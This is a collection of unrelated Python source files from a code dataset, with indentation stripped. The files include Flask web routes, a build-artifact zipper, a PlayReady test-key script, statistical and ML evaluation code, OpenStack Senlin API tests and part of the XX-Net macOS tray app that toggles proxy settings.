user = Users.objects(id=id).get()
results = [(Users.username.verbose_name,user.username),(Users.specialties.verbose_name,','.join(user.specialties)),(Users.interests.verbose_name,','.join(user.interests))]
return render_template('users/details.html',pagetitle='Detalii utilizator',results=results)
@mod.route('/ajaxedit/<action>/<id>', methods=['GET'])
@admin_required
@login_required
def ajaxedit(action,id):
user = Users.objects(id=id).get()
if action == 'delete' and id != unicode(g.user.id):
user.delete()
if action == 'mkadmin' and id != unicode(g.user.id):
user.permissions = 'full'
user.save()
if action == 'mkuser' and id != unicode(g.user.id):
user.permissions = 'user'
user.save()
if action == 'deactivate' and id != unicode(g.user.id):
user.status = False
user.save()
if action == 'activate' and id != unicode(g.user.id):
user.status = True
user.save()
return redirect(request.referrer)
|
nilq/baby-python
|
python
|
import argparse
import os
import zipfile
def make_rel_archive(a_args):
archive = zipfile.ZipFile("(Part 1) Engine Fixes.zip".format(a_args.name), "w", zipfile.ZIP_DEFLATED)
def do_write(a_path):
archive.write(a_path, "SKSE/Plugins/{}".format(os.path.basename(a_path)))
def write_rootfile(a_extension):
do_write("{}/{}{}".format(a_args.src_dir, a_args.name, a_extension))
do_write(a_args.dll)
write_rootfile("_preload.txt")
write_rootfile("_SNCT.toml")
write_rootfile(".toml")
def make_dbg_archive(a_args):
archive = zipfile.ZipFile("{}_pdb.zip".format(a_args.name), "w", zipfile.ZIP_DEFLATED)
archive.write(a_args.pdb, os.path.basename(a_args.pdb))
def parse_arguments():
parser = argparse.ArgumentParser(description="archive build artifacts for distribution")
parser.add_argument("--dll", type=str, help="the full dll path", required=True)
parser.add_argument("--name", type=str, help="the project name", required=True)
parser.add_argument("--out-dir", type=str, help="the output directory", required=True)
parser.add_argument("--pdb", type=str, help="the full pdb path", required=True)
parser.add_argument("--src-dir", type=str, help="the project root source directory", required=True)
return parser.parse_args()
def main():
args = parse_arguments()
os.makedirs(args.out_dir, exist_ok=True)
os.chdir(args.out_dir)
make_rel_archive(args)
make_dbg_archive(args)
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
## Create Microsoft Test Server DRM keys, parse LAURL array
## python.exe RegisterDRM_MicrosoftTest.py > keys_microsofttest.json
## Aki Nieminen/Sofia Digital
## 2017-11-30/Aki: changed hexdecode to python3
## 2017-08-21/Aki: initial release
import sys, os, time, datetime, json, base64
from optparse import OptionParser
def registerPlayready(drmType, auth, kid, enckey):
now = datetime.datetime.utcnow() + datetime.timedelta(minutes=120)
url="https://test.playready.microsoft.com/service/rightsmanager.asmx"
params = "cfg=(kid:header,sl:2000,persist:false,firstexp:%s,contentkey:%s)" % (
60*1, ##expiration(seconds) on first play
##now.strftime('%Y%m%d%H%M%S'), ##expiration:20170921000000
#base64.b64encode(enckey.decode('hex'))
base64.b64encode(bytearray.fromhex(enckey)).decode("ISO-8859-1")
)
return url + "?" + params
def register(drmType, auth, kid, enckey):
if kid.startswith("0x"): kid = kid[2:]
if enckey.startswith("0x"): enckey = enckey[2:]
obj={}
obj["kid"]=kid
obj["key"]=enckey ## real production system should keep KEY value secret !!
obj["playready"]=registerPlayready(drmType, auth, kid, enckey)
obj["b64kid"]=base64.b64encode(bytearray.fromhex(kid)).decode("ISO-8859-1")
obj["b64key"]=base64.b64encode(bytearray.fromhex(enckey)).decode("ISO-8859-1")
return obj;
##############################
##############################
class DRM_TYPE: ## enum
TEST=0
PROD=1
def main():
## parse command line arguments
parser = OptionParser(add_help_option=False)
parser.add_option("-h", "--help", action="help")
parser.add_option("--authtest", type="string", dest="authtest", help="Authentication key for test service (not used)")
(options, args) = parser.parse_args()
## Register KID and ENCKEY values to license service
now = datetime.datetime.utcnow()
obj={}
obj["created"]=now.strftime('%Y-%m-%dT%H:%M:%SZ')
obj["Test1234"]=register(DRM_TYPE.TEST, options.authtest, "0x43215678123412341234123412341234", "0x12341234123412341234123412341234")
obj["Test1235"]=register(DRM_TYPE.TEST, options.authtest, "43215678123412341234123412341235", "12341234123412341234123412341235")
obj["Test1236"]=register(DRM_TYPE.TEST, options.authtest, "43215678123412341234123412341236", "12341234123412341234123412341236")
obj["Test1237"]=register(DRM_TYPE.TEST, options.authtest, "43215678123412341234123412341237", "12341234123412341234123412341237")
obj["Test1238"]=register(DRM_TYPE.TEST, options.authtest, "43215678123412341234123412341238", "12341234123412341234123412341238")
obj["Test1239"]=register(DRM_TYPE.TEST, options.authtest, "43215678123412341234123412341239", "12341234123412341234123412341239")
obj["Test148D"]=register(DRM_TYPE.TEST, options.authtest, "5A461E692ABF5534A30FFC45BFD7148D", "307F7B3F5579BEF53894A6D946762267")
obj = json.dumps(obj, indent=2, sort_keys=True, ensure_ascii=False)
print (obj)
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
from .face_utils import align_crop_face_landmarks, compute_increased_bbox, get_valid_bboxes, paste_face_back
from .misc import img2tensor, load_file_from_url, scandir
__all__ = [
'align_crop_face_landmarks', 'compute_increased_bbox', 'get_valid_bboxes', 'load_file_from_url', 'paste_face_back',
'img2tensor', 'scandir'
]
|
nilq/baby-python
|
python
|
import numpy as np
def AdjHE_estimator(A,data, npc=0, std=False):
# remove identifiers form y for linear algebra
y = data.Residual
# select PC columns
PC_cols = [ col.startswith("PC") for col in data ]
PCs = data.iloc[:, PC_cols]
# If standardized AdjHE is chosen
if (std == True) :
# Standardize the y
std_y = (y-np.mean(y))/np.std(y)
trA = np.sum(np.diag(A))
trA2 = np.sum(np.multiply(A,A))
n = A.shape[1]
yay = np.dot(std_y.T, np.dot(A,std_y)).flatten()
yty = np.dot(std_y.T, std_y).flatten()
if (npc==0):
denominator = trA2 - 2*trA + n
nominator = n - trA + yay - yty
else:
pc = PCs
s = np.diag(np.dot(pc.T,np.dot(A,pc)))
b = s - 1
c = np.dot(std_y.T, pc)**2 - 1
denominator = trA2 - 2*trA + n - np.sum(b**2)
nominator = n - trA + yay - yty - np.sum(b*c)
h2 = nominator/denominator
h2 = h2[0]
var_ge = 2/denominator
# tau = n/nmarkers
# b1 = (1-np.sqrt(tau))**2
# b2 = (1+np.sqrt(tau))**2
# r = b2-b1
# a1 = h2-1
# a2 = 1-2*h2
# trace_A2_MP = 0.5*(r+2*b1)*n
# trace_A3_MP = (5/16*r**2+b1*b2)*n
# trace_A4_MP = (7*r**3+30*b1*r**2+48*b1**2*r+32*b1**3)/32*n
# if (npc==0):
# # var_MP = 2/denominator
# var_ge = 2/denominator
# else:
# trace_A_MP = trA - np.sum(s)
# a = denominator
# # var_MP=2/a**2*(h2**2*trace_A4_MP+(n-npc)*a1**2+(a2**2+2*h2*a1)*trace_A2_MP+2*a1*a2*trace_A_MP+2*h2*a2*trace_A3_MP)
# var_ge = 2/a
else :
# else we solve the unstandardized version
trA2 = np.sum(np.multiply(A,A))
trA = np.sum(np.diag(A))
n = A.shape[1]
yay = np.dot(y.T, np.dot(A,y)).flatten()
yty = np.dot(y.T, y).flatten()
tn = np.sum(y)**2/n # all 1s PC
if (npc==0):
sigg = n*yay - trA*yty
sigg = sigg-yay+tn*trA # add 1's
sige = trA2*yty - trA*yay
sige = sige-tn*trA2 # add 1's
denominator = trA2 - 2*trA + n
else:
# remove identifiers for linear algebra
pc = PCs
pcA = np.dot(pc.T,A)
pcApc = np.dot(pcA,pc)
s = np.diag(pcApc) #pciApci
b = s-1
t = np.dot(y.transpose(),pc)**2 #ypcipciy
a11 = trA2 - np.sum(s**2)
a12 = trA - np.sum(s)
b1 = yay - np.sum(s*t)
b2 = yty - np.sum(t)
sigg = (n-npc)*b1 - a12*b2
sigg = sigg.flatten() - yay.flatten() + tn * a12 # add 1's
sige = a11*b2 - a12*b1
sige = sige.flatten()-tn*a11 # add 1's
denominator = trA2 - 2*trA + n - np.sum(b**2)
h2 = sigg/(sigg+sige)
var_ge = 2/denominator
return h2,np.sqrt(var_ge)
|
nilq/baby-python
|
python
|
import os, sys, hashlib, argparse
BLOCK_SIZE = 65536
def calculateFileHash(path):
hasher = hashlib.md5()
with open(path, 'rb') as targetFile:
buffer = targetFile.read(BLOCK_SIZE)
while len(buffer) > 0:
hasher.update(buffer)
buffer = targetFile.read(BLOCK_SIZE)
return hasher.hexdigest()
def isFileNonEmpty(path):
return os.path.getsize(path) > 0
def getDuplicatesInFolderByHash(folder):
filesDict = {}
for dirName, subDirs, fileList in os.walk(folder):
print('Scanning folder ' + dirName + " - By hash")
for filename in fileList:
path = os.path.join(dirName, filename)
if(isFileNonEmpty(path)):
fileHash = calculateFileHash(path)
if fileHash in filesDict:
filesDict[fileHash].append(path)
else:
filesDict[fileHash] = [path]
else:
print("Skipping empty file " + path)
return filesDict
def getDuplicatesInFolderByFilename(folder):
filesDict = {}
for dirName, subDirs, fileList in os.walk(folder):
print('Scanning folder ' + dirName + " - By filename")
for filename in fileList:
path = os.path.join(dirName, filename)
if(isFileNonEmpty(path)):
if filename in filesDict:
filesDict[filename].append(path)
else:
filesDict[filename] = [path]
else:
print("Skipping empty file " + path)
return filesDict
def processResult(filesDict):
values = filesDict.values()
foundDuplicates = False
for fileOccurs in values:
if(len(fileOccurs) > 1):
fileName= os.path.basename(fileOccurs[0])
foundDuplicates = True
print("\nFound duplicate " + fileName + " at:")
for f in fileOccurs:
print(f)
if foundDuplicates == False:
print("No duplicates found")
def parseArguments():
parser = argparse.ArgumentParser(description='Duplicates Finder Parameters')
parser.add_argument('-V', '--version', action='version', version='0.0.1')
parser.add_argument("-d", "--dir", help="Supplied directory to navigate", type=str, required = True)
parser.add_argument("-f", "--byfilename", help="Compare files by filename instead of hash", dest='byfilename', action='store_true')
parser.set_defaults(byfilename=False)
return parser.parse_args()
def findDuplicates(args):
if args.dir:
folderPath = args.dir
if os.path.exists(folderPath):
if args.byfilename:
filesDict = getDuplicatesInFolderByFilename(folderPath)
else:
filesDict = getDuplicatesInFolderByHash(folderPath)
processResult(filesDict)
else:
print("The supplied directory does not exist")
else:
print("Please supply target directory using --dir")
if __name__ == '__main__':
args = parseArguments()
findDuplicates(args)
|
nilq/baby-python
|
python
|
import os
import torch
import numpy as np
from sentence_transformers import SentenceTransformer
from experiment.qa.evaluation import BasicQAEvaluation
class QAEvaluationSBert(BasicQAEvaluation):
def __init__(self, config, config_global, logger):
super(QAEvaluationSBert, self).__init__(config, config_global, logger)
os.environ['TORCH_HOME'] = config["sbert"]["cache_dir"]
self.model = SentenceTransformer(config["sbert"]["model"])
self.batch_size = config["batchsize"]
def start(self, model, data, valid_only=False):
return super(QAEvaluationSBert, self).start(model, data, valid_only)
def score(self, qa_pairs, model, data, tasks):
query_examples = [q.text for (q, _, _) in qa_pairs]
doc_examples = [a.text for (_, a, _) in qa_pairs]
repr_queries = torch.from_numpy(np.stack(self.model.encode(query_examples, batch_size=self.batch_size, show_progress_bar=False)))
repr_docs = torch.from_numpy(np.stack(self.model.encode(doc_examples, batch_size=self.batch_size, show_progress_bar=False)))
scores = torch.cosine_similarity(repr_queries, repr_docs)
return scores.cpu().numpy(), np.zeros(1)
component = QAEvaluationSBert
|
nilq/baby-python
|
python
|
"""Test Home Assistant ulid util methods."""
import uuid
import homeassistant.util.ulid as ulid_util
async def test_ulid_util_uuid_hex():
"""Verify we can generate a ulid."""
assert len(ulid_util.ulid_hex()) == 32
assert uuid.UUID(ulid_util.ulid_hex())
|
nilq/baby-python
|
python
|
from flask import Flask, render_template, request, Response
from Models import db, SensorData, CustomSensor
from flask.json import jsonify
from Arduino import serial_port
from threading import Thread
from Helpers import search_sensor
from Constants import DataTypes
import os.path
db_path = os.path.join('sqlite://', os.path.dirname(os.path.abspath(__file__)), 'database.sqlite')
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////home/eukeni/PycharmProjects/Hydroponics/database.sqlite'
db.init_app(app)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/api/query', methods=['GET'])
def query():
headers = dict()
cs = CustomSensor.query.all()
sensors = [name for name in dir(SensorData) if name.startswith('sensor_')]
for sensor in sensors:
row = search_sensor(sensor, cs)
if row is None:
headers[sensor] = sensor
else:
headers[sensor] = row.name
data = [x.to_json() for x in SensorData.query.all()]
return jsonify(data=data, headers=headers)
@app.route('/api/get_custom_sensor', methods=['GET'])
def get_custom_sensors():
return_list = list()
data = CustomSensor.query.all()
sensors = [name for name in dir(SensorData) if name.startswith('sensor_')]
for sensor in sensors:
row = search_sensor(sensor, data)
if row is None:
return_list.append(dict(name='', formula='', data_type=0, sensor_field=sensor))
else:
return_list.append(dict(name=row.name, data_type=row.data_type, formula=row.formula, sensor_field=row.sensor_field))
return jsonify(sensors=return_list)
@app.route('/api/get_available_sensors', methods=['GET'])
def get_available_sensors():
data = [name for name in dir(SensorData) if name.startswith('sensor_')]
return jsonify(sensors=data)
@app.route('/api/save_custom_sensors', methods=['POST'])
def save_custom_sensors():
data = request.get_json()
sensors = CustomSensor.query.all()
for sensor in data:
row = search_sensor(sensor['sensor_field'], sensors)
if row is None:
cs = CustomSensor(None, None, sensor['name'], sensor['sensor_field'], sensor['formula'], sensor['data_type'])
db.session.add(cs)
else:
row.name = sensor['name']
row.formula = sensor['formula']
row.data_type = sensor['data_type']
db.session.commit()
return Response(status=200)
@app.route('/api/get_data_types', methods=['GET'])
def get_data_types():
return jsonify(types=[dict(name=key.title(), value=DataTypes.__dict__[key]) for key in DataTypes.__dict__ if not key.startswith('__')])
if __name__ == '__main__':
t = Thread(target=serial_port, args=(2, ))
t.daemon = False
# t.start()
app.run()
|
nilq/baby-python
|
python
|
#basic program of finding the SECOND LARGEST VALUE among the given list of value
#finding the RUNNER UP in other words
#used map(),split(),sorted()
#the sorted()function here creates a new set returns a sorted list of the specified iterable object.
if __name__ == '__main__':
#getting the number of scores you are going to enter
n = int(input("Enter number of scores : "))
#using map() and split() function to get the no.of.scores
arr = map(int,input("\nEnter the scores : ").split())
#now we are sorting the whole entered scores in ascending manner and then used[-2] which indicates that in the set take the next to last value(which is the second largest)
print ("The RUNNER UP IS:",(sorted(set(arr))[-2]))
|
nilq/baby-python
|
python
|
from collections import namedtuple
ButtonOptions = namedtuple('ButtonOptions',
['activebackground', 'activeforeground', 'anchor', 'background', 'bitmap', 'borderwidth',
'disabledforeground', 'font', 'foreground', 'highlightbackground', 'highlightcolor',
'highlightthickness', 'image', 'justify', 'padx', 'pady', 'relief', 'repeatdelay',
'repeatinterval', 'takefocus', 'textvariable', 'underline', 'wraplength', 'compound',
'default', 'height', 'cursor', 'overrelief', 'state', 'width'])
ButtonOptions.__new__.__defaults__ = (None,) * len(ButtonOptions._fields)
ScaleOptions = namedtuple('ScaleOptions',
['activebackground', 'background', 'bigincrement', 'bd', 'bg', 'borderwidth', 'cursor',
'digits', 'fg', 'font', 'foreground', 'highlightbackground', 'highlightcolor',
'highlightthickness', 'length', 'orient', 'relief', 'repeatdelay', 'repeatinterval',
'resolution', 'showvalue', 'sliderlength', 'sliderrelief', 'state', 'takefocus',
'tickinterval', 'troughcolor', 'variable', 'width'])
ScaleOptions.__new__.__defaults__ = (None,) * len(ScaleOptions._fields)
|
nilq/baby-python
|
python
|
"""Constants for the Thruk Livestatus sensor integration."""
# This is the internal name of the integration, it should also match the directory
# name for the integration.
DOMAIN = "thruk_livestatus"
HOST_COUNT = "Host count"
NUM_SERVICES_CRIT = "Services CRITICAL"
NUM_SERVICES_WARN = "Services WARNING"
NUM_SERVICES_OK = "Services OK"
NUM_SERVICES_UNKNOWN = "Services UNKNOWN"
HOSTS_UP = "Hosts UP"
HOSTS_DOWN = "Hosts DOWN"
HOSTS_UNKNOWN = "Hosts UNKNOWN"
|
nilq/baby-python
|
python
|
import decoder
inp_fn = raw_input("Enter the file name to decode:")
sp_fn_a = inp_fn.split('.')
sp_fn_b = sp_fn_a[0].split('_')
inp_fs = open(inp_fn,"r")
out_fs = open("decoded_"+sp_fn_b[1]+'.'+sp_fn_b[2],"wb+")
enc_ln = int(inp_fs.readline())
st_to_dec = inp_fs.readline()
while st_to_dec!='':
out_fs.write(decoder.decode(enc_ln,int(st_to_dec)))
st_to_dec = inp_fs.readline()
out_fs.close()
inp_fs.close()
|
nilq/baby-python
|
python
|
"""Plants tests"""
|
nilq/baby-python
|
python
|
import time, sys, random
from pygame import mixer
from PyQt5.QtWidgets import QDialog, QApplication
from PyQt5 import QtWidgets, QtCore
from src.ui.controlPenalUI import Ui_controlPenal
from src.songScreen import picWindow
class controlPenal(QDialog):
def __init__(self):
super().__init__()
self.ui = Ui_controlPenal()
self.ui.setupUi(self)
self.ui.loadRound8.clicked.connect(self.setRound8)
self.ui.loadRound4.clicked.connect(self.setRound4)
self.ui.loadRoundFinal.clicked.connect(self.setRoundFinal)
self.ui.startPick.clicked.connect(self.startPick)
self.ui.clearTxt.clicked.connect(self.clearTxt)
self.ui.removeFromList.clicked.connect(self.removeFromList)
self.picW=picWindow()
self.picW.show()
self.pic=0
self.list=[]
self.show()
def closeEvent(self, event):
self.__del__()
def __del__(self):
self.picW.close()
def setRound8(self):
self.list=[]
f=open("round8.txt","r")
for line in f.readlines():
self.list.append(line.rstrip())
self.setTable()
def setRound4(self):
self.list=[]
f=open("round4.txt","r")
for line in f.readlines():
self.list.append(line.rstrip())
self.setTable()
def setRoundFinal(self):
self.list=[]
f=open("roundfinal.txt","r")
for line in f.readlines():
self.list.append(line.rstrip())
self.setTable()
def setTable(self):
self.ui.songList.setRowCount(0)
for row_number,content in enumerate(self.list):
self.ui.songList.insertRow(row_number)
self.ui.songList.setItem(row_number, 0, QtWidgets.QTableWidgetItem(str(content)))
def startPick(self):
mixer.init()
mixer.music.load("./song/opener.mp3")
mixer.music.play()
for i in range(0,62,2):
self.callRandomPic()
self.picW.updatePic(self.list[self.pic])
QApplication.processEvents()
print(self.list[self.pic])
time.sleep(0.01*i)
sound=mixer.Sound("./song/"+self.list[self.pic]+".wav")
time.sleep(2)
mixer.music.stop()
self.ui.result.setText(self.list[self.pic])
QApplication.processEvents()
sound.play()
f=open("result.txt","w")
f.write(self.list[self.pic])
f.close()
time.sleep(sound.get_length())
def callRandomPic(self):
rand=random.randint(0,len(self.list)-1)
while rand==self.pic:
rand=random.randint(0,len(self.list)-1)
self.pic=rand
def clearTxt(self):
self.picW.clearPic()
self.ui.result.setText("")
f=open("result.txt","w")
f.write("")
f.close()
def removeFromList(self):
pos=self.ui.songList.currentRow()
del self.list[pos]
self.setTable()
|
nilq/baby-python
|
python
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from tempest.lib import decorators
from tempest.lib import exceptions
from senlin_tempest_plugin.common import constants
from senlin_tempest_plugin.tests.api import base
class TestPolicyCreateNegativeBadRequest(base.BaseSenlinAPITest):
@decorators.attr(type=['negative'])
@decorators.idempotent_id('3fea4aa9-6dee-4202-8611-cf2d008a4d42')
def test_policy_create_policy_data_not_specified(self):
params = {
'policy': {
'name': 'test-policy'
}
}
# Verify badrequest exception(400) is raised.
ex = self.assertRaises(exceptions.BadRequest,
self.client.create_obj,
'policies', params)
message = ex.resp_body['error']['message']
self.assertEqual("'spec' is a required property", str(message))
@decorators.attr(type=['negative'])
@decorators.idempotent_id('4a4d6c83-f0fa-4c9e-914b-d89478903d95')
def test_policy_create_name_not_specified(self):
params = {
'policy': {
'spec': constants.spec_scaling_policy
}
}
# Verify badrequest exception(400) is raised.
ex = self.assertRaises(exceptions.BadRequest,
self.client.create_obj,
'policies', params)
message = ex.resp_body['error']['message']
self.assertEqual("'name' is a required property", str(message))
@decorators.attr(type=['negative'])
@decorators.idempotent_id('b898de6c-996a-4bc3-bdef-6490e62fb3b0')
def test_policy_create_invalid_param(self):
params = {
'policy': {
'name': 'bar',
'spec': {},
'boo': 'foo'
}
}
# Verify badrequest exception(400) is raised.
ex = self.assertRaises(exceptions.BadRequest,
self.client.create_obj,
'policies', params)
message = ex.resp_body['error']['message']
self.assertIn("Additional properties are not allowed", str(message))
@decorators.attr(type=['negative'])
@decorators.idempotent_id('1c0ed145-bca6-4e53-b222-44fc6978eb1f')
def test_policy_create_policy_type_incorrect(self):
spec = copy.deepcopy(constants.spec_scaling_policy)
spec['type'] = 'senlin.policy.bogus'
params = {
'policy': {
'name': 'test-policy',
'spec': spec
}
}
# Verify badrequest exception(404) is raised.
ex = self.assertRaises(exceptions.NotFound,
self.client.create_obj,
'policies', params)
message = ex.resp_body['error']['message']
self.assertEqual(
"The policy_type 'senlin.policy.bogus-1.0' could "
"not be found.", str(message))
@decorators.attr(type=['negative'])
@decorators.idempotent_id('f55dc7eb-9863-49c2-b001-368d2057c53c')
def test_policy_create_spec_validation_failed(self):
spec = copy.deepcopy(constants.spec_scaling_policy)
spec['properties']['bogus'] = 'foo'
params = {
'policy': {
'name': 'test-policy',
'spec': spec
}
}
# Verify badrequest exception(400) is raised.
ex = self.assertRaises(exceptions.ServerFault,
self.client.create_obj,
'policies', params)
message = ex.resp_body['error']['message']
self.assertEqual("Unrecognizable spec item 'bogus'",
str(message))
|
nilq/baby-python
|
python
|
import sys
import argparse
import json
import logging
import os
from TrainFace import TrainFace
from InferFace import InferFace
if __name__ == "__main__":
# Read the input information by the user on the command line
parser = argparse.ArgumentParser()
parser.add_argument("--config_file", help="config path of model",
default=r"E:\3业余资料\10人脸性别分类\code\config\face.json")
parser.add_argument("--phase", default="train")
args = parser.parse_args()
model_file = args.config_file
with open(model_file, "r", encoding="UTF-8") as fr:
config = json.load(fr)
if args.phase == "train":
config["phase"] = "train"
if args.phase == "infer":
config["phase"] = "infer"
log_path = config["global"]["log_path"]
task = config["global"]["task"]
if log_path:
if not os.path.exists(os.path.dirname(log_path)):
os.makedirs(os.path.dirname(log_path))
logger = logging.getLogger(task)
logger.setLevel(logging.INFO)
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
file_handler = logging.FileHandler(log_path, encoding="UTF-8")
file_handler.setLevel(logging.INFO)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
if args.phase == "train":
config["phase"] = "train"
TrainFace(config)
elif args.phase == "infer":
config["phase"] = "infer"
InferFace(config)
|
nilq/baby-python
|
python
|
class Solution(object):
def defangIPaddr(self, address):
"""
:type address: str
:rtype: str
"""
return address.replace(".", "[.]")
if __name__ == '__main__':
address = "0.0.0.0"
obj = Solution()
obj.defangIPaddr(address)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# coding:utf-8
import os
import sys
current_path = os.path.dirname(os.path.abspath(__file__))
helper_path = os.path.join(current_path, os.pardir, os.pardir, os.pardir, 'data', 'launcher', 'helper')
if __name__ == "__main__":
python_path = os.path.abspath( os.path.join(current_path, os.pardir, 'python27', '1.0'))
noarch_lib = os.path.abspath( os.path.join(python_path, 'lib', 'noarch'))
sys.path.append(noarch_lib)
osx_lib = os.path.join(python_path, 'lib', 'darwin')
sys.path.append(osx_lib)
extra_lib = "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC"
sys.path.append(extra_lib)
import config
import module_init
import subprocess
import webbrowser
from xlog import getLogger
xlog = getLogger("launcher")
import AppKit
import SystemConfiguration
from PyObjCTools import AppHelper
class MacTrayObject(AppKit.NSObject):
def __init__(self):
pass
def applicationDidFinishLaunching_(self, notification):
setupHelper()
loadConfig()
self.setupUI()
self.registerObserver()
def setupUI(self):
self.statusbar = AppKit.NSStatusBar.systemStatusBar()
self.statusitem = self.statusbar.statusItemWithLength_(AppKit.NSSquareStatusItemLength) #NSSquareStatusItemLength #NSVariableStatusItemLength
# Set initial image icon
icon_path = os.path.join(current_path, "web_ui", "favicon-mac.ico")
image = AppKit.NSImage.alloc().initByReferencingFile_(icon_path.decode('utf-8'))
image.setScalesWhenResized_(True)
image.setSize_((20, 20))
self.statusitem.setImage_(image)
# Let it highlight upon clicking
self.statusitem.setHighlightMode_(1)
self.statusitem.setToolTip_("XX-Net")
# Get current selected mode
proxyState = getProxyState(currentService)
# Build a very simple menu
self.menu = AppKit.NSMenu.alloc().initWithTitle_('XX-Net')
menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Config', 'config:', '')
self.menu.addItem_(menuitem)
menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(getCurrentServiceMenuItemTitle(), None, '')
self.menu.addItem_(menuitem)
self.currentServiceMenuItem = menuitem
menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Enable Auto GAEProxy', 'enableAutoProxy:', '')
if proxyState == 'pac':
menuitem.setState_(AppKit.NSOnState)
self.menu.addItem_(menuitem)
self.autoGaeProxyMenuItem = menuitem
menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Enable Global GAEProxy', 'enableGlobalProxy:', '')
if proxyState == 'gae':
menuitem.setState_(AppKit.NSOnState)
self.menu.addItem_(menuitem)
self.globalGaeProxyMenuItem = menuitem
menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Enable Global X-Tunnel', 'enableGlobalXTunnel:', '')
if proxyState == 'x_tunnel':
menuitem.setState_(AppKit.NSOnState)
self.menu.addItem_(menuitem)
self.globalXTunnelMenuItem = menuitem
menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Enable Global Smart-Router', 'enableGlobalSmartRouter:', '')
if proxyState == 'smart_router':
menuitem.setState_(AppKit.NSOnState)
self.menu.addItem_(menuitem)
self.globalSmartRouterMenuItem = menuitem
menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Disable GAEProxy', 'disableProxy:', '')
if proxyState == 'disable':
menuitem.setState_(AppKit.NSOnState)
self.menu.addItem_(menuitem)
self.disableGaeProxyMenuItem = menuitem
# Reset Menu Item
menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Reset Each Module', 'restartEachModule:', '')
self.menu.addItem_(menuitem)
# Default event
menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Quit', 'windowWillClose:', '')
self.menu.addItem_(menuitem)
# Bind it to the status item
self.statusitem.setMenu_(self.menu)
# Hide dock icon
AppKit.NSApp.setActivationPolicy_(AppKit.NSApplicationActivationPolicyProhibited)
def updateStatusBarMenu(self):
self.currentServiceMenuItem.setTitle_(getCurrentServiceMenuItemTitle())
# Remove Tick before All Menu Items
self.autoGaeProxyMenuItem.setState_(AppKit.NSOffState)
self.globalGaeProxyMenuItem.setState_(AppKit.NSOffState)
self.globalXTunnelMenuItem.setState_(AppKit.NSOffState)
self.globalSmartRouterMenuItem.setState_(AppKit.NSOffState)
self.disableGaeProxyMenuItem.setState_(AppKit.NSOffState)
# Get current selected mode
proxyState = getProxyState(currentService)
# Update Tick before Menu Item
if proxyState == 'pac':
self.autoGaeProxyMenuItem.setState_(AppKit.NSOnState)
elif proxyState == 'gae':
self.globalGaeProxyMenuItem.setState_(AppKit.NSOnState)
elif proxyState == 'x_tunnel':
self.globalXTunnelMenuItem.setState_(AppKit.NSOnState)
elif proxyState == 'smart_router':
self.globalSmartRouterMenuItem.setState_(AppKit.NSOnState)
elif proxyState == 'disable':
self.disableGaeProxyMenuItem.setState_(AppKit.NSOnState)
# Trigger autovalidation
self.menu.update()
def validateMenuItem_(self, menuItem):
return currentService or (menuItem != self.autoGaeProxyMenuItem and
menuItem != self.globalGaeProxyMenuItem and
menuItem != self.globalXTunnelMenuItem and
menuItem != self.globalSmartRouterMenuItem and
menuItem != self.disableGaeProxyMenuItem)
def presentAlert_withTitle_(self, msg, title):
self.performSelectorOnMainThread_withObject_waitUntilDone_('presentAlertWithInfo:', [title, msg], True)
return self.alertReturn
def presentAlertWithInfo_(self, info):
alert = AppKit.NSAlert.alloc().init()
alert.setMessageText_(info[0])
alert.setInformativeText_(info[1])
alert.addButtonWithTitle_("OK")
alert.addButtonWithTitle_("Cancel")
self.alertReturn = alert.runModal() == AppKit.NSAlertFirstButtonReturn
def registerObserver(self):
nc = AppKit.NSWorkspace.sharedWorkspace().notificationCenter()
nc.addObserver_selector_name_object_(self, 'windowWillClose:', AppKit.NSWorkspaceWillPowerOffNotification, None)
def windowWillClose_(self, notification):
executeResult = subprocess.check_output(['networksetup', '-listallnetworkservices'])
services = executeResult.split('\n')
services = filter(lambda service : service and service.find('*') == -1 and getProxyState(service) != 'disable', services) # Remove disabled services and empty lines
if len(services) > 0:
try:
map(helperDisableAutoProxy, services)
map(helperDisableGlobalProxy, services)
except:
disableAutoProxyCommand = ';'.join(map(getDisableAutoProxyCommand, services))
disableGlobalProxyCommand = ';'.join(map(getDisableGlobalProxyCommand, services))
executeCommand = 'do shell script "%s;%s" with administrator privileges' % (disableAutoProxyCommand, disableGlobalProxyCommand)
xlog.info("try disable proxy:%s", executeCommand)
subprocess.call(['osascript', '-e', executeCommand])
module_init.stop_all()
os._exit(0)
AppKit.NSApp.terminate_(self)
def config_(self, notification):
host_port = config.get(["modules", "launcher", "control_port"], 8085)
webbrowser.open_new("http://127.0.0.1:%s/" % host_port)
def restartEachModule_(self, _):
module_init.stop_all()
module_init.start_all_auto()
def enableAutoProxy_(self, _):
try:
helperDisableGlobalProxy(currentService)
helperEnableAutoProxy(currentService)
except:
disableGlobalProxyCommand = getDisableGlobalProxyCommand(currentService)
enableAutoProxyCommand = getEnableAutoProxyCommand(currentService)
executeCommand = 'do shell script "%s;%s" with administrator privileges' % (disableGlobalProxyCommand, enableAutoProxyCommand)
xlog.info("try enable auto proxy:%s", executeCommand)
subprocess.call(['osascript', '-e', executeCommand])
